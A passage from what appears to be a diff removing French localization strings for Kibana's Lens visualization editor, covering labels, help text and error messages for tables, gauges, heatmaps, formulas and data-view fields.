Il est recommandé de conserver un faible nombre de colonnes pour éviter le défilement horizontal.", - "xpack.lens.datatable.breakdownRows": "Lignes", - "xpack.lens.datatable.breakdownRows.description": "Divisez le tableau par champ. Cette opération est recommandée pour les répartitions à cardinalité élevée.", - "xpack.lens.datatable.column.help": "Colonne de tableau de données", - "xpack.lens.datatable.conjunctionSign": " & ", - "xpack.lens.datatable.expressionHelpLabel": "Outil de rendu de tableaux de données", - "xpack.lens.datatable.groupLabel": "Tabulaire", - "xpack.lens.datatable.label": "Tableau", - "xpack.lens.datatable.metrics": "Indicateurs", - "xpack.lens.datatable.suggestionLabel": "En tant que tableau", - "xpack.lens.datatable.titleLabel": "Titre", - "xpack.lens.datatable.visualizationName": "Tableau de données", - "xpack.lens.datatable.visualizationOf": "Tableau {operations}", - "xpack.lens.datatypes.boolean": "booléen", - "xpack.lens.datatypes.date": "date", - "xpack.lens.datatypes.geoPoint": "geo_point", - "xpack.lens.datatypes.geoShape": "geo_shape", - "xpack.lens.datatypes.histogram": "histogramme", - "xpack.lens.datatypes.ipAddress": "IP", - "xpack.lens.datatypes.murmur3": "murmur3", - "xpack.lens.datatypes.number": "numéro", - "xpack.lens.datatypes.record": "enregistrement", - "xpack.lens.datatypes.string": "chaîne", - "xpack.lens.deleteLayerAriaLabel": "Supprimer le calque {index}", - "xpack.lens.dimensionContainer.close": "Fermer", - "xpack.lens.dimensionContainer.closeConfiguration": "Fermer la configuration", - "xpack.lens.discover.visualizeFieldLegend": "Visualiser le champ", - "xpack.lens.dragDrop.altOption": "Alt/Option", - "xpack.lens.dragDrop.announce.cancelled": "Mouvement annulé. {label} revenu à sa position initiale", - "xpack.lens.dragDrop.announce.cancelledItem": "Mouvement annulé. 
{label} revenu au groupe {groupLabel} à la position {position}", - "xpack.lens.dragDrop.announce.combine.short": " Maintenir la touche Contrôle enfoncée pour combiner", - "xpack.lens.dragDrop.announce.dropped.reordered": "{label} réorganisé dans le groupe {groupLabel} de la position {prevPosition} à la position {position}", - "xpack.lens.dragDrop.announce.droppedNoPosition": "{label} ajouté à {dropLabel}", - "xpack.lens.dragDrop.announce.duplicate.short": " Maintenez la touche Alt ou Option enfoncée pour dupliquer.", - "xpack.lens.dragDrop.announce.lifted": "{label} levé", - "xpack.lens.dragDrop.announce.selectedTarget.defaultNoPosition": "Ajoutez {label} à {dropLabel}. Appuyer sur la barre d'espace ou sur Entrée pour ajouter", - "xpack.lens.dragDrop.announce.selectedTarget.noSelected": "Aucune cible sélectionnée. Utiliser les touches fléchées pour sélectionner une cible", - "xpack.lens.dragDrop.announce.selectedTarget.reordered": "Réorganisez {label} dans le groupe {groupLabel} de la position {prevPosition} à la position {position}. Appuyer sur la barre d'espace ou sur Entrée pour réorganiser", - "xpack.lens.dragDrop.announce.selectedTarget.reorderedBack": "{label} revenu à sa position initiale {prevPosition}", - "xpack.lens.dragDrop.announce.swap.short": " Maintenez la touche Maj enfoncée pour permuter.", - "xpack.lens.dragDrop.combine": "Combiner", - "xpack.lens.dragDrop.control": "Contrôler", - "xpack.lens.dragDrop.duplicate": "Dupliquer", - "xpack.lens.dragDrop.keyboardInstructions": "Appuyez sur la barre d'espace ou sur Entrée pour commencer à faire glisser. Lors du glissement, utilisez les touches fléchées gauche/droite pour vous déplacer entre les cibles de dépôt. Appuyez à nouveau sur la barre d'espace ou sur Entrée pour terminer.", - "xpack.lens.dragDrop.keyboardInstructionsReorder": "Appuyez sur la barre d'espace ou sur Entrée pour commencer à faire glisser. 
Lors du glissement, utilisez les touches fléchées haut/bas pour réorganiser les éléments dans le groupe et les touches gauche/droite pour choisir les cibles de dépôt à l'extérieur du groupe. Appuyez à nouveau sur la barre d'espace ou sur Entrée pour terminer.", - "xpack.lens.dragDrop.shift": "Déplacer", - "xpack.lens.dragDrop.swap": "Permuter", - "xpack.lens.editorFrame.aggregateIndicatorLabel": "Cette dimension n'est pas visible dans le graphique car toutes les valeurs individuelles sont agrégées en une valeur unique", - "xpack.lens.editorFrame.applyChanges": "Appliquer les modifications", - "xpack.lens.editorFrame.applyChangesLabel": "Appliquer les modifications", - "xpack.lens.editorFrame.applyChangesWorkspacePrompt": "Appliquer les modifications pour générer le rendu de la visualisation", - "xpack.lens.editorFrame.buildExpressionError": "Une erreur inattendue s'est produite lors de la préparation du graphique", - "xpack.lens.editorFrame.colorIndicatorLabel": "Couleur de cette dimension : {hex}", - "xpack.lens.editorFrame.configurationFailureMoreErrors": " +{errors} {errors, plural, one {erreur} other {erreurs}}", - "xpack.lens.editorFrame.dataFailure": "Une erreur s'est produite lors du chargement des données.", - "xpack.lens.editorFrame.dataViewNotFound": "Vue de données introuvable", - "xpack.lens.editorFrame.dataViewReconfigure": "Recréez-la dans la page de gestion des vues de données.", - "xpack.lens.editorFrame.emptyWorkspace": "Déposer quelques champs ici pour commencer", - "xpack.lens.editorFrame.emptyWorkspaceHeading": "Lens est l’éditeur recommandé pour la création de visualisations.", - "xpack.lens.editorFrame.emptyWorkspaceSimple": "Déposer le champ ici", - "xpack.lens.editorFrame.expandRenderingErrorButton": "Afficher les détails de l'erreur", - "xpack.lens.editorFrame.expressionFailure": "Une erreur s'est produite dans l'expression", - "xpack.lens.editorFrame.expressionFailureMessage": "Erreur de requête : {type}, {reason}", - 
"xpack.lens.editorFrame.expressionFailureMessageWithContext": "Erreur de requête : {type}, {reason} dans {context}", - "xpack.lens.editorFrame.expressionMissingDatasource": "Impossible de trouver la source de données pour la visualisation", - "xpack.lens.editorFrame.expressionMissingDataView": "{count, plural, one {Vue de données introuvable} other {Vues de données introuvables}} : {ids}.", - "xpack.lens.editorFrame.expressionMissingVisualizationType": "Type de visualisation non trouvé.", - "xpack.lens.editorFrame.goToForums": "Formuler des requêtes et donner un retour", - "xpack.lens.editorFrame.invisibleIndicatorLabel": "Cette dimension n'est pas visible actuellement dans le graphique", - "xpack.lens.editorFrame.networkErrorMessage": "Erreur réseau, réessayez plus tard ou contactez votre administrateur.", - "xpack.lens.editorFrame.noColorIndicatorLabel": "Cette dimension n'a pas de couleur individuelle", - "xpack.lens.editorFrame.optionalDimensionLabel": "Facultatif", - "xpack.lens.editorFrame.paletteColorIndicatorLabel": "Cette dimension utilise une palette", - "xpack.lens.editorFrame.previewErrorLabel": "L'aperçu du rendu a échoué", - "xpack.lens.editorFrame.requiresFieldWarningLabel": "Nécessite un champ.", - "xpack.lens.editorFrame.requiresTwoOrMoreFieldsWarningLabel": "Nécessite des champs {requiredMinDimensionCount}.", - "xpack.lens.editorFrame.suggestionPanelTitle": "Suggestions", - "xpack.lens.editorFrame.workspaceLabel": "Espace de travail", - "xpack.lens.embeddable.failure": "Impossible d'afficher la visualisation", - "xpack.lens.embeddable.fixErrors": "Effectuez des modifications dans l'éditeur Lens pour corriger l'erreur", - "xpack.lens.embeddable.legacyURLConflict.shortMessage": "Vous avez rencontré un conflit d’URL.", - "xpack.lens.embeddable.missingTimeRangeParam.longMessage": "La propriété timeRange est requise pour cette configuration.", - "xpack.lens.embeddable.missingTimeRangeParam.shortMessage": "Propriété timeRange manquante", - 
"xpack.lens.embeddable.moreErrors": "Effectuez des modifications dans l'éditeur Lens pour afficher plus d'erreurs", - "xpack.lens.embeddableDisplayName": "lens", - "xpack.lens.endValue.nearest": "La plus proche", - "xpack.lens.endValue.none": "Masquer", - "xpack.lens.endValue.zero": "Zéro", - "xpack.lens.endValueDescription.nearest": "Étendre la série avec la première/dernière valeur au bord du graphique", - "xpack.lens.endValueDescription.none": "Ne pas étendre la série au bord du graphique", - "xpack.lens.endValueDescription.zero": "Étendre la série au bord du graphique avec la valeur zéro", - "xpack.lens.fieldFormats.longSuffix.d": "par jour", - "xpack.lens.fieldFormats.longSuffix.h": "par heure", - "xpack.lens.fieldFormats.longSuffix.m": "par minute", - "xpack.lens.fieldFormats.longSuffix.s": "par seconde", - "xpack.lens.fieldFormats.suffix.d": "/d", - "xpack.lens.fieldFormats.suffix.h": "/h", - "xpack.lens.fieldFormats.suffix.m": "/m", - "xpack.lens.fieldFormats.suffix.s": "/s", - "xpack.lens.fieldFormats.suffix.title": "Suffixe", - "xpack.lens.fittingFunctionsDescription.carry": "Remplit les blancs avec la dernière valeur", - "xpack.lens.fittingFunctionsDescription.linear": "Remplit les blancs avec une ligne", - "xpack.lens.fittingFunctionsDescription.lookahead": "Remplit les blancs avec la valeur suivante", - "xpack.lens.fittingFunctionsDescription.none": "Ne remplit pas les blancs", - "xpack.lens.fittingFunctionsDescription.zero": "Remplit les blancs avec des zéros", - "xpack.lens.fittingFunctionsTitle.carry": "Dernier", - "xpack.lens.fittingFunctionsTitle.linear": "Linéaire", - "xpack.lens.fittingFunctionsTitle.lookahead": "Suivant", - "xpack.lens.fittingFunctionsTitle.none": "Masquer", - "xpack.lens.fittingFunctionsTitle.zero": "Zéro", - "xpack.lens.formula.base": "base", - "xpack.lens.formula.decimals": "décimales", - "xpack.lens.formula.disableWordWrapLabel": "Désactiver le renvoi à la ligne des mots", - "xpack.lens.formula.editorHelpInlineHideLabel": 
"Masquer la référence des fonctions", - "xpack.lens.formula.editorHelpInlineHideToolTip": "Masquer la référence des fonctions", - "xpack.lens.formula.editorHelpInlineShowToolTip": "Afficher la référence des fonctions", - "xpack.lens.formula.editorHelpOverlayToolTip": "Référence des fonctions", - "xpack.lens.formula.fullScreenEnterLabel": "Développer", - "xpack.lens.formula.fullScreenExitLabel": "Réduire", - "xpack.lens.formula.kqlExtraArguments": "[kql]?: string, [lucene]?: string", - "xpack.lens.formula.left": "gauche", - "xpack.lens.formula.max": "max", - "xpack.lens.formula.min": "min", - "xpack.lens.formula.number": "numéro", - "xpack.lens.formula.optionalArgument": "Facultatif. La valeur par défaut est {defaultValue}", - "xpack.lens.formula.requiredArgument": "Requis", - "xpack.lens.formula.right": "droite", - "xpack.lens.formula.shiftExtraArguments": "[shift]?: string", - "xpack.lens.formula.string": "chaîne", - "xpack.lens.formula.value": "valeur", - "xpack.lens.formulaCommonFormulaDocumentation": "Les formules les plus courantes divisent deux valeurs pour produire un pourcentage. Pour obtenir un affichage correct, définissez \"Format de valeur\" sur \"pourcent\".", - "xpack.lens.formulaDocumentation.columnCalculationSection": "Calculs de colonnes", - "xpack.lens.formulaDocumentation.columnCalculationSectionDescription": "Ces fonctions sont exécutées pour chaque ligne, mais elles sont fournies avec la colonne entière comme contexte. 
Elles sont également appelées fonctions de fenêtre.", - "xpack.lens.formulaDocumentation.elasticsearchSection": "Elasticsearch", - "xpack.lens.formulaDocumentation.elasticsearchSectionDescription": "Ces fonctions seront exécutées sur les documents bruts pour chaque ligne du tableau résultant, en agrégeant tous les documents correspondant aux dimensions de répartition en une seule valeur.", - "xpack.lens.formulaDocumentation.filterRatio": "Rapport de filtre", - "xpack.lens.formulaDocumentation.header": "Référence de formule", - "xpack.lens.formulaDocumentation.mathSection": "Mathématique", - "xpack.lens.formulaDocumentation.mathSectionDescription": "Ces fonctions seront exécutées pour chaque ligne du tableau résultant en utilisant des valeurs uniques de la même ligne calculées à l'aide d'autres fonctions.", - "xpack.lens.formulaDocumentation.percentOfTotal": "Pourcentage du total", - "xpack.lens.formulaDocumentation.weekOverWeek": "Semaine après semaine", - "xpack.lens.formulaDocumentationHeading": "Fonctionnement", - "xpack.lens.formulaEnableWordWrapLabel": "Activer le renvoi à la ligne des mots", - "xpack.lens.formulaErrorCount": "{count} {count, plural, one {erreur} other {erreurs}}", - "xpack.lens.formulaExampleMarkdown": "Exemples", - "xpack.lens.formulaFrequentlyUsedHeading": "Formules courantes", - "xpack.lens.formulaPlaceholderText": "Saisissez une formule en combinant des fonctions avec la fonction mathématique, telle que :", - "xpack.lens.formulaSearchPlaceholder": "Rechercher des fonctions", - "xpack.lens.formulaWarningCount": "{count} {count, plural, one {avertissement} other {avertissements}}", - "xpack.lens.functions.collapse.args.byHelpText": "Colonnes selon lesquelles effectuer le regroupement - ces colonnes sont conservées telles quelles", - "xpack.lens.functions.collapse.args.fnHelpText": "Fonction agrégée à appliquer", - "xpack.lens.functions.collapse.args.metricHelpText": "Colonne pour laquelle calculer la fonction agrégée spécifiée", - 
"xpack.lens.functions.collapse.help": "Réduisez plusieurs lignes en une ligne unique à l'aide de la fonction agrégée spécifiée.", - "xpack.lens.functions.counterRate.args.byHelpText": "Colonne selon laquelle le calcul du taux de compteur sera divisé", - "xpack.lens.functions.counterRate.args.inputColumnIdHelpText": "Colonne pour laquelle le taux de compteur sera calculé", - "xpack.lens.functions.counterRate.args.outputColumnIdHelpText": "Colonne dans laquelle le taux de compteur résultant sera stocké", - "xpack.lens.functions.counterRate.args.outputColumnNameHelpText": "Nom de la colonne dans laquelle le taux de compteur résultant sera stocké", - "xpack.lens.functions.counterRate.help": "Calcule le taux de compteur d'une colonne dans un tableau de données", - "xpack.lens.functions.lastValue.missingSortField": "Cette vue de données ne contient aucun champ de date.", - "xpack.lens.functions.timeScale.dateColumnMissingMessage": "L'ID de colonne de date {columnId} n'existe pas.", - "xpack.lens.functions.timeScale.timeInfoMissingMessage": "Impossible de récupérer les informations d'histogramme des dates", - "xpack.lens.gauge.addLayer": "Visualisation", - "xpack.lens.gauge.appearanceLabel": "Apparence", - "xpack.lens.gauge.dynamicColoring.label": "Couleurs de bande", - "xpack.lens.gauge.gaugeLabel": "Jauge", - "xpack.lens.gauge.goalValueLabel": "Valeur de l’objectif", - "xpack.lens.gauge.maxValueLabel": "Valeur maximale", - "xpack.lens.gauge.metricLabel": "Indicateur", - "xpack.lens.gauge.minValueLabel": "Valeur minimale", - "xpack.lens.gaugeHorizontal.gaugeLabel": "Horizontal à jauge", - "xpack.lens.gaugeVertical.gaugeLabel": "Vertical à jauge", - "xpack.lens.gaugeVisualization.goalValueGreaterMaximumShortMessage": "La valeur de l’objectif est supérieure à la valeur maximale.", - "xpack.lens.gaugeVisualization.metricValueGreaterMaximumShortMessage": "La valeur de l’indicateur est supérieure à la valeur maximale.", - 
"xpack.lens.gaugeVisualization.minimumValueGreaterGoalShortMessage": "La valeur minimale est supérieure à la valeur de l’objectif.", - "xpack.lens.gaugeVisualization.minValueGreaterMetricShortMessage": "La valeur minimale est supérieure à la valeur de l’indicateur.", - "xpack.lens.geoFieldWorkspace.dropMessage": "Déposer le champ ici pour l'ouvrir dans Maps", - "xpack.lens.geoFieldWorkspace.dropZoneLabel": "zone de dépôt pour ouvrir dans Maps", - "xpack.lens.guageVisualization.chartCannotRenderEqual": "Les valeurs minimale et maximale peuvent ne pas être égales.", - "xpack.lens.guageVisualization.chartCannotRenderMinGreaterMax": "La valeur minimale peut ne pas être supérieure à la valeur maximale.", - "xpack.lens.heatmap.addLayer": "Visualisation", - "xpack.lens.heatmap.cellValueLabel": "Valeur de cellule", - "xpack.lens.heatmap.groupLabel": "Carte thermique", - "xpack.lens.heatmap.heatmapLabel": "Carte thermique", - "xpack.lens.heatmap.horizontalAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe horizontal est activé.", - "xpack.lens.heatmap.horizontalAxisLabel": "Axe horizontal", - "xpack.lens.heatmap.verticalAxisDisabledHelpText": "Ce paramètre s'applique uniquement lorsque l'axe vertical est activé.", - "xpack.lens.heatmap.verticalAxisLabel": "Axe vertical", - "xpack.lens.heatmapChart.legendVisibility.hide": "Masquer", - "xpack.lens.heatmapChart.legendVisibility.show": "Afficher", - "xpack.lens.heatmapVisualization.arrayValuesWarningMessage": "{label} contient des valeurs de tableau. 
Le rendu de votre visualisation peut ne pas se présenter comme attendu.", - "xpack.lens.heatmapVisualization.heatmapGroupLabel": "Magnitude", - "xpack.lens.heatmapVisualization.heatmapLabel": "Carte thermique", - "xpack.lens.heatmapVisualization.missingXAccessorLongMessage": "La configuration de l'axe horizontal est manquante.", - "xpack.lens.heatmapVisualization.missingXAccessorShortMessage": "Axe horizontal manquant.", - "xpack.lens.indexPattern.addColumnAriaLabel": "Ajouter ou glisser-déposer un champ dans {groupLabel}", - "xpack.lens.indexPattern.addColumnAriaLabelClick": "Ajouter une annotation à {groupLabel}", - "xpack.lens.indexPattern.advancedSettings": "Ajouter des options avancées", - "xpack.lens.indexPattern.allFieldsLabel": "Tous les champs", - "xpack.lens.indexPattern.allFieldsLabelHelp": "Glissez-déposez les champs disponibles dans l’espace de travail et créez des visualisations. Pour modifier les champs disponibles, sélectionnez une vue de données différente, modifiez vos requêtes ou utilisez une plage temporelle différente. Certains types de champ ne peuvent pas être visualisés dans Lens, y compris les champ de texte intégral et champs géographiques.", - "xpack.lens.indexPattern.allFieldsSamplingLabelHelp": "Les champs disponibles contiennent les données des 500 premiers documents correspondant aux filtres. Pour afficher tous les filtres, développez les champs vides. Vous ne pouvez pas créer de visualisations avec des champs de texte intégral, géographiques, lissés et d’objet.", - "xpack.lens.indexPattern.ascendingCountPrecisionErrorWarning": "{name} pour cette visualisation peut être approximatif en raison de la manière dont les données sont indexées. Essayez de trier par rareté plutôt que par nombre ascendant d’enregistrements. 
Pour en savoir plus sur cette limitation, {link}.", - "xpack.lens.indexPattern.ascendingCountPrecisionErrorWarning.link": "veuillez consulter la documentation", - "xpack.lens.indexPattern.autoIntervalLabel": "Auto ({interval})", - "xpack.lens.indexPattern.availableFieldsLabel": "Champs disponibles", - "xpack.lens.indexPattern.avg": "Moyenne", - "xpack.lens.indexPattern.avg.description": "Agrégation d'indicateurs à valeur unique qui calcule la moyenne des valeurs numériques extraites des documents agrégés", - "xpack.lens.indexPattern.avgOf": "Moyenne de {name}", - "xpack.lens.indexPattern.bytesFormatLabel": "Octets (1024)", - "xpack.lens.indexPattern.calculations.dateHistogramErrorMessage": "{name} requiert un histogramme des dates pour fonctionner. Ajoutez un histogramme des dates ou sélectionnez une autre fonction.", - "xpack.lens.indexPattern.calculations.layerDataType": "{name} est désactivé pour ce type de calque.", - "xpack.lens.indexPattern.cardinality": "Compte unique", - "xpack.lens.indexPattern.cardinality.signature": "champ : chaîne", - "xpack.lens.indexPattern.cardinalityOf": "Compte unique de {name}", - "xpack.lens.indexPattern.changeDataViewTitle": "Vue de données", - "xpack.lens.indexPattern.chooseField": "Champ", - "xpack.lens.indexPattern.chooseFieldLabel": "Pour utiliser cette fonction, sélectionnez un champ.", - "xpack.lens.indexPattern.chooseSubFunction": "Choisir une sous-fonction", - "xpack.lens.indexPattern.columnFormatLabel": "Format de valeur", - "xpack.lens.indexPattern.columnLabel": "Nom", - "xpack.lens.indexPattern.count": "Décompte", - "xpack.lens.indexPattern.counterRate": "Taux de compteur", - "xpack.lens.indexPattern.counterRate.signature": "indicateur : nombre", - "xpack.lens.indexPattern.CounterRateOf": "Taux de compteur de {name}", - "xpack.lens.indexPattern.countOf": "Nombre d'enregistrements", - "xpack.lens.indexPattern.cumulative_sum.signature": "indicateur : nombre", - "xpack.lens.indexPattern.cumulativeSum": "Somme cumulée", - 
"xpack.lens.indexPattern.cumulativeSumOf": "Somme cumulée de {name}", - "xpack.lens.indexPattern.dataViewLoadError": "Erreur lors du chargement de la vue de données", - "xpack.lens.indexPattern.dateHistogram": "Histogramme des dates", - "xpack.lens.indexPattern.dateHistogram.autoAdvancedExplanation": "L'intervalle suit cette logique :", - "xpack.lens.indexPattern.dateHistogram.autoBasicExplanation": "L'histogramme des dates automatique divise un champ de données en groupes par intervalle.", - "xpack.lens.indexPattern.dateHistogram.autoBoundHeader": "Intervalle cible mesuré", - "xpack.lens.indexPattern.dateHistogram.autoIntervalHeader": "Intervalle utilisé", - "xpack.lens.indexPattern.dateHistogram.autoLongerExplanation": "Pour choisir l'intervalle, Lens divise la plage temporelle spécifiée par le paramètre {targetBarSetting}. Lens calcule le meilleur intervalle pour vos données. Par exemple 30m, 1h et 12. Le nombre maximal de barres est défini par la valeur {maxBarSetting}.", - "xpack.lens.indexPattern.dateHistogram.bindToGlobalTimePicker": "Lier au sélecteur d'heure globale", - "xpack.lens.indexPattern.dateHistogram.dropPartialBuckets": "Abandonner les compartiments partiels", - "xpack.lens.indexPattern.dateHistogram.dropPartialBucketsHelp": "L’abandon des compartiments partiels est désactivé, car ceux-ci ne peuvent être calculés que pour un champ temporel lié au sélecteur d’heure globale en haut à droite.", - "xpack.lens.indexPattern.dateHistogram.globalTimePickerHelp": "Filtrez le champ sélectionné à l’aide du sélecteur d’heure globale en haut à droite. Ce paramètre ne peut pas être désactivé pour le champ temporel par défaut de la vue de données actuelle.", - "xpack.lens.indexPattern.dateHistogram.includeEmptyRows": "Inclure les lignes vides", - "xpack.lens.indexPattern.dateHistogram.invalidInterval": "Choisissez un intervalle valide. 
Il n'est pas possible d'utiliser plusieurs semaines, mois ou années comme intervalle.", - "xpack.lens.indexPattern.dateHistogram.minimumInterval": "Intervalle minimal", - "xpack.lens.indexPattern.dateHistogram.moreThanYear": "Plus d'une année", - "xpack.lens.indexPattern.dateHistogram.restrictedInterval": "Intervalle fixé à {intervalValue} en raison de restrictions d'agrégation.", - "xpack.lens.indexPattern.dateHistogram.selectIntervalPlaceholder": "Choisir un intervalle", - "xpack.lens.indexPattern.dateHistogram.selectOptionHelpText": "Choisissez une option ou créez une valeur personnalisée. Exemples : 30s, 20m, 24h, 2d, 1w, 1M", - "xpack.lens.indexPattern.dateHistogram.titleHelp": "Fonctionnement de l'histogramme des dates automatique", - "xpack.lens.indexPattern.dateHistogram.upTo": "Jusqu'à", - "xpack.lens.indexPattern.dateHistogramTimeShift": "Dans un calque unique, vous ne pouvez pas combiner un décalage de plage temporelle précédent avec des histogrammes de dates. Utilisez une durée de décalage temporel explicite dans \"{column}\" ou remplacez l’histogramme de dates.", - "xpack.lens.indexPattern.decimalPlacesLabel": "Décimales", - "xpack.lens.indexPattern.defaultFormatLabel": "Par défaut", - "xpack.lens.indexPattern.derivative": "Différences", - "xpack.lens.indexPattern.derivativeOf": "Différences de {name}", - "xpack.lens.indexPattern.differences.signature": "indicateur : nombre", - "xpack.lens.indexPattern.editFieldLabel": "Modifier le champ de la vue de données", - "xpack.lens.indexPattern.emptyDimensionButton": "Dimension vide", - "xpack.lens.indexPattern.emptyFieldsLabel": "Champs vides", - "xpack.lens.indexPattern.emptyFieldsLabelHelp": "Les champs vides ne contenaient aucune valeur dans les 500 premiers documents basés sur vos filtres.", - "xpack.lens.indexPattern.enableAccuracyMode": "Activer le mode de précision", - "xpack.lens.indexPattern.existenceErrorAriaLabel": "La récupération de l'existence a échoué", - 
"xpack.lens.indexPattern.existenceErrorLabel": "Impossible de charger les informations de champ", - "xpack.lens.indexPattern.existenceTimeoutAriaLabel": "La récupération de l'existence a expiré", - "xpack.lens.indexPattern.existenceTimeoutLabel": "Les informations de champ ont pris trop de temps", - "xpack.lens.indexPattern.fieldDistributionLabel": "Distribution", - "xpack.lens.indexPattern.fieldItem.visualizeGeoFieldLinkText": "Visualiser dans Maps", - "xpack.lens.indexPattern.fieldItemTooltip": "Effectuez un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldNoOperation": "Le champ {field} ne peut pas être utilisé sans opération", - "xpack.lens.indexPattern.fieldPanelEmptyStringValue": "Chaîne vide", - "xpack.lens.indexPattern.fieldPlaceholder": "Champ", - "xpack.lens.indexPattern.fieldsNotFound": "{count, plural, one {Champ} other {Champs}} {missingFields} {count, plural, one {introuvable} other {introuvables}}", - "xpack.lens.indexPattern.fieldStatsButtonAriaLabel": "Prévisualiser {fieldName} : {fieldType}", - "xpack.lens.indexPattern.fieldStatsButtonEmptyLabel": "Ce champ ne comporte aucune donnée mais vous pouvez toujours effectuer un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldStatsButtonLabel": "Cliquez pour obtenir un aperçu du champ, ou effectuez un glisser-déposer pour visualiser.", - "xpack.lens.indexPattern.fieldStatsCountLabel": "Compte", - "xpack.lens.indexPattern.fieldStatsDisplayToggle": "Basculer soit", - "xpack.lens.indexPattern.fieldStatsLimited": "Le résumé des informations n'est pas disponible pour les champs de type de gamme.", - "xpack.lens.indexPattern.fieldStatsMurmur3Limited": "Le résumé des informations n'est pas disponible pour les champs murmur3.", - "xpack.lens.indexPattern.fieldStatsNoData": "Lens ne peut pas créer de visualisation avec ce champ, car il ne contient pas de données. 
Pour créer une visualisation, glissez-déposez un autre champ.", - "xpack.lens.indexPattern.fieldStatsSamplingNoData": "Lens ne peut pas créer de visualisation avec ce champ, car il ne contient aucune donnée dans les 500 premiers documents correspondant aux filtres. Pour créer une visualisation, glissez-déposez un autre champ.", - "xpack.lens.indexPattern.fieldsWrongType": "{count, plural, one {Champ} other {Champs}} {invalidFields} {count, plural, other {de type incorrect}}", - "xpack.lens.indexPattern.fieldTimeDistributionLabel": "Répartition du temps", - "xpack.lens.indexPattern.fieldTopValuesLabel": "Valeurs les plus élevées", - "xpack.lens.indexPattern.filterBy.clickToEdit": "Cliquer pour modifier", - "xpack.lens.indexPattern.filterBy.emptyFilterQuery": "(vide)", - "xpack.lens.indexPattern.filterBy.label": "Filtrer par", - "xpack.lens.indexPattern.filters": "Filtres", - "xpack.lens.indexPattern.filters.addaFilter": "Ajouter un filtre", - "xpack.lens.indexPattern.filters.clickToEdit": "Cliquer pour modifier", - "xpack.lens.indexPattern.filters.isInvalid": "Cette requête n'est pas valide", - "xpack.lens.indexPattern.filters.label.placeholder": "Tous les enregistrements", - "xpack.lens.indexPattern.filters.queryPlaceholderKql": "{example}", - "xpack.lens.indexPattern.filters.queryPlaceholderLucene": "{example}", - "xpack.lens.indexPattern.filters.removeFilter": "Retirer un filtre", - "xpack.lens.indexPattern.formulaExpressionNotHandled": "L'opération {operation} dans la formule ne comprend pas les paramètres suivants : {params}", - "xpack.lens.indexPattern.formulaExpressionParseError": "La formule {expression} ne peut pas être analysée", - "xpack.lens.indexPattern.formulaExpressionWrongType": "Les paramètres de l'opération {operation} dans la formule ont un type incorrect : {params}", - "xpack.lens.indexPattern.formulaFieldNotFound": "{variablesLength, plural, one {Champ} other {Champs}} {variablesList} introuvable(s)", - 
"xpack.lens.indexPattern.formulaFieldNotRequired": "L'opération {operation} n'accepte aucun champ comme argument", - "xpack.lens.indexPattern.formulaFieldValue": "champ", - "xpack.lens.indexPattern.formulaFilterableHelpText": "Le filtre spécifié sera appliqué à la formule entière.", - "xpack.lens.indexPattern.formulaLabel": "Formule", - "xpack.lens.indexPattern.formulaMathMissingArgument": "L'opération {operation} dans la formule ne comprend pas les arguments {count} : {params}", - "xpack.lens.indexPattern.formulaMetricValue": "indicateur", - "xpack.lens.indexPattern.formulaNoFieldForOperation": "aucun champ", - "xpack.lens.indexPattern.formulaNoOperation": "aucune opération", - "xpack.lens.indexPattern.formulaOperationDoubleQueryError": "Utilisez uniquement kql= ou lucene=, mais pas les deux", - "xpack.lens.indexPattern.formulaOperationDuplicateParams": "Les paramètres de l'opération {operation} ont été déclarés plusieurs fois : {params}", - "xpack.lens.indexPattern.formulaOperationFiltersTypeConflicts": "Le filtre de formule de type \"{outerType}\" n’est pas compatible avec le filtre interne de type \"{innerType}\" de l’opération {operation}.", - "xpack.lens.indexPattern.formulaOperationQueryError": "Des guillemets simples sont requis pour {language}='' à {rawQuery}", - "xpack.lens.indexPattern.formulaOperationTooManyFirstArguments": "L'opération {operation} dans la formule requiert un {type} {supported, plural, one {unique} other {pris en charge}}, trouvé : {text}", - "xpack.lens.indexPattern.formulaOperationValue": "opération", - "xpack.lens.indexPattern.formulaOperationwrongArgument": "L'opération {operation} dans la formule ne prend pas en charge les paramètres {type}, trouvé : {text}", - "xpack.lens.indexPattern.formulaOperationWrongFirstArgument": "Le premier argument pour {operation} doit être un nom {type}. 
Trouvé {argument}", - "xpack.lens.indexPattern.formulaOperationWrongReturnedType": "Le type de valeur de retour de l’opération {text} n’est pas pris en charge dans la formule.", - "xpack.lens.indexPattern.formulaParameterNotRequired": "L'opération {operation} n'accepte aucun paramètre", - "xpack.lens.indexPattern.formulaPartLabel": "Partie de {label}", - "xpack.lens.indexPattern.formulaWarning": "Formule actuellement appliquée", - "xpack.lens.indexPattern.formulaWarningStaticValueText": "Pour écraser votre formule, modifiez la valeur dans le champ de saisie.", - "xpack.lens.indexPattern.formulaWarningText": "Pour écraser votre formule, sélectionnez une fonction rapide", - "xpack.lens.indexPattern.formulaWithTooManyArguments": "L'opération {operation} a trop d'arguments", - "xpack.lens.indexPattern.functionsLabel": "Fonctions", - "xpack.lens.indexPattern.groupByDropdown": "Regrouper par", - "xpack.lens.indexPattern.helpLabel": "Aide sur les fonctions", - "xpack.lens.indexPattern.hideZero": "Masquer les valeurs nulles", - "xpack.lens.indexPattern.incompleteOperation": "(incomplet)", - "xpack.lens.indexPattern.intervals": "Intervalles", - "xpack.lens.indexPattern.invalidFieldLabel": "Champ non valide. Vérifiez votre vue de données ou choisissez un autre champ.", - "xpack.lens.indexPattern.invalidOperationLabel": "Ce champ ne fonctionne pas avec la fonction sélectionnée.", - "xpack.lens.indexPattern.invalidReferenceConfiguration": "La dimension \"{dimensionLabel}\" n'est pas configurée correctement", - "xpack.lens.indexPattern.invalidTimeShift": "Décalage non valide. Entrez un entier positif suivi par l'une des unités suivantes : s, m, h, d, w, M, y. 
